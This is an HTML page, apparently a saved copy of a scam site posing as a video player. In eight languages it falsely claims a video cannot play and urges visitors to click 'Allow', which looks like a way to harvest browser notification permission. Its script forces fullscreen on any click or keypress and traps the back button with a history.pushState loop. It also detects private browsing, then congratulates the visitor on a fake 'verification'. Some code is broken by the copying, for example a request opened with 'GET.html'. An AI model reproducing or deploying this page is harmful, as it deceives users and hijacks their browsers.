<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Video</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body,
        html {
            background-color: #fff;
            height: 100%
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            color: #626262;
            font: 400 16px Roboto, Arial, sans-serif;
            margin: 0;
            overflow: hidden;
            user-select: none
        }

        .fix {
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%;
            z-index: 4
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .cnt,
        .cnt:before {
            height: 100%;
            width: 100%
        }

        .cnt:before {
            background-color: hsla(0, 0%, 100%, .5);
            content: "";
            left: 0;
            position: absolute;
            top: 0;
            z-index: 2
        }

        .bg {
            -webkit-filter: blur(4px);
            background: url(images/video-2/bg.png) no-repeat;
            background-size: 100% auto;
            filter: blur(4px);
            height: 100%;
            max-width: 1024px;
            position: relative;
            width: 100%;
            z-index: 1
        }

        .bg,
        .popup {
            margin: auto
        }

        .popup {
            background-color: #fff;
            border-radius: 3px;
            box-shadow: 0 0 10px rgba(0, 0, 0, .2);
            left: 0;
            max-width: 310px;
            overflow: hidden;
            padding: 10px;
            position: absolute;
            right: 0;
            top: 50%;
            transform: translateY(-50%);
            z-index: 3
        }

        .popup__ic {
            float: left;
            height: 30px;
            margin-right: 5px;
            width: 30px
        }

        .popup__cnt {
            overflow: hidden
        }

        .popup__cntTx {
            font-size: 18px
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            color: #fff;
            height: 100%;
            left: 0;
            position: fixed;
            text-align: center;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @media (min-width:425px) {
            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:700px) {
            .popup {
                max-width: 515px;
                padding: 25px 20px
            }

            .popup__ic {
                margin-right: 15px
            }

            .popup__cntTx {
                font-size: 22px
            }
        }
    </style>
</head>

<body>
    <div class="cnt">
        <div class="bg"></div>
        <div class="popup"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="popup__ic" viewBox="0 0 510 510">
                <path fill="#3c76de" d="M255,510c28.05,0,51-22.95,51-51H204C204,487.05,226.95,510,255,510z M420.75,357V216.75 c0-79.05-53.55-142.8-127.5-160.65V38.25C293.25,17.85,275.4,0,255,0c-20.4,0-38.25,17.85-38.25,38.25V56.1 c-73.95,17.85-127.5,81.6-127.5,160.65V357l-51,51v25.5h433.5V408L420.75,357z"></path>
            </svg>
            <div class="popup__cnt">
                <div class="popup__cntTx"></div>
            </div>
        </div>
    </div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <div class="fix"></div>
    <script>
        ! function(t) {
            var o = {};

            function r(e) {
                if (o[e]) return o[e].exports;
                var n = o[e] = {
                    i: e,
                    l: !1,
                    exports: {}
                };
                return t[e].call(n.exports, n, n.exports, r), n.l = !0, n.exports
            }
            r.m = t, r.c = o, r.d = function(e, n, t) {
                r.o(e, n) || Object.defineProperty(e, n, {
                    enumerable: !0,
                    get: t
                })
            }, r.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, r.t = function(n, e) {
                if (1 & e && (n = r(n)), 8 & e) return n;
                if (4 & e && "object" == typeof n && n && n.__esModule) return n;
                var t = Object.create(null);
                if (r.r(t), Object.defineProperty(t, "default", {
                        enumerable: !0,
                        value: n
                    }), 2 & e && "string" != typeof n)
                    for (var o in n) r.d(t, o, function(e) {
                        return n[e]
                    }.bind(null, o));
                return t
            }, r.n = function(e) {
                var n = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return r.d(n, "a", n), n
            }, r.o = function(e, n) {
                return Object.prototype.hasOwnProperty.call(e, n)
            }, r.p = "", r(r.s = 2)
        }([function(e, n) {
            if (0 === "".length) {
                var t = function() {
                    void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
                };
                document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
            }
        }, , function(e, n, t) {
            "use strict";
            t.r(n);
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var r = document.title,
                    i = location.pathname + location.search;
                history.pushState(null, r, i), window.addEventListener("popstate", function() {
                    history.pushState({}, r, i)
                })
            }
            t(0);
            var a = function(n) {
                    var e = decodeURIComponent(document.cookie).split(";");
                    if (0 === e.length) return null;
                    var t = null;
                    return e.some(function(e) {
                        if (" " === e[0] && (e = e.slice(1)), e = e.split("="), n === e[0]) return t = e[1], !0
                    }), t
                },
                d = function(e, n, t, o) {
                    var r = new Date;
                    r.setTime(r.getTime() + 1e3 * t);
                    var i = "; expires=" + r.toUTCString(),
                        a = "";
                    void 0 !== o && (a = "; domain=" + o), document.cookie = e + "=" + (n || "") + a + i + "; path=/"
                },
                l = function(e, n) {
                    var t = new XMLHttpRequest;
                    t.addEventListener("readystatechange", function() {
                        if (2 === this.readyState && void 0 !== n) return n()
                    }), t.addEventListener("error", function() {
                        if (void 0 !== n) return n()
                    }), t.open("GET.html", e, !0), t.responseType = "text", t.send()
                },
                c = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                v = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function r() {
                            return n(e)
                        }
                        if ("safari" === v.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === v.n) {
                            var i = indexedDB.open("test.html");
                            i.addEventListener("error", o), i.addEventListener("success", r)
                        } else {
                            if ("edge" === v.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== v.n && "yandex" !== v.n && "chrome" !== v.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, r, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            r = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            i = /UBrowser/.test(this.ua),
                            a = /Edge\//.test(this.ua),
                            s = null;
                        return e ? s = "opera" : n ? s = "firefox" : r ? s = "yandex" : i ? s = "uc" : a ? s = "edge" : o ? s = "chrome" : t && (s = "safari"), s
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== v.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                },
                p = v,
                w = u();

            var g = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    p.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                b = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (b.k = navigator.language.slice(0, 2)), void 0 === e[b.k] && (b.k = "en"), b.t = e[b.k]
                    },
                    get: function(e) {
                        return b.t[e]
                    }
                },
                y = b;

            function P(e) {
                c({
                    a: e ? "success" : "close"
                }), null !== window.opener && void 0 !== window.opener && close(), document.querySelector(".cnt").classList.add("isHide"), document.querySelector(".msgReady").classList.remove("isHide")
            }
            var R = "convert";
            y.set({
                en: {
                    text: 'This video cannot be displayed!<br>Perhaps your browser does not allow you to play the video. Click "Allow" to watch the video.',
                    msgReady: "You have successfully passed the verification!<br>Now you can close the window."
                },
                uk: {
                    text: 'Це відео не може відображатися!<br>Можливо, ваш браузер не дозволяє вам відтворювати відео. Натисніть "Дозволити", щоб переглянути відео.',
                    msgReady: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    text: 'Tego filmu wideo nie można wyświetlić!<br>Być może Twoja przeglądarka nie zezwala na odtwarzanie wideo. Kliknij "Zezwalaj", aby obejrzeć wideo.',
                    msgReady: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                ru: {
                    text: "Это видео невозможно отобразить!<br>Возможно, ваш браузер не позволяет воспроизводить видео. Нажмите «Разрешить» для просмотра видео.",
                    msgReady: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                fr: {
                    text: 'Cette vidéo ne peut pas être affichée!<br>Votre navigateur ne vous permet peut-être pas de lire la vidéo. Cliquez sur "Autoriser" pour regarder la vidéo.',
                    msgReady: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    text: 'Dieses Video kann nicht angezeigt werden!<br>Vielleicht lässt Ihr Browser das Video nicht wiedergeben. Klicken Sie auf "Zulassen", um das Video anzusehen.',
                    msgReady: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    text: 'Este video no se puede mostrar!<br>Tal vez su navegador no le permita reproducir el video. Haga clic en "Permitir" para ver el video.',
                    msgReady: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                th: {
                    text: 'ไม่สามารถแสดงวิดีโอนี้!<br>บางทีเบราว์เซอร์ของคุณไม่อนุญาตให้คุณเล่นวิดีโอ คลิก "อนุญาต" เพื่อดูวิดีโอ',
                    msgReady: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), document.querySelector(".popup__cntTx").innerHTML = y.get("text"), document.querySelector(".msgReady__tx").innerHTML = y.get("msgReady")
        }]);
    </script>
</body>


</html>
